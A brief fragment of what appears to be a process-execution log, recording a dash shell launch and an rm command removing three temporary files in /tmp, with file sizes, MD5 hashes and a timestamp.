                                                                  Path:/usr/bin/dash
                                                                  Arguments:-
                                                                  File size:129816 bytes
                                                                  MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                  Start time (UTC):22:10:31
                                                                  Start date (UTC):23/03/2025
                                                                  Path:/usr/bin/rm
                                                                  Arguments:rm -f /tmp/tmp.02dxt6juF6 /tmp/tmp.Fsmp9UZGoQ /tmp/tmp.XCADvBpgho
                                                                  File size:72056 bytes
                                                                  MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b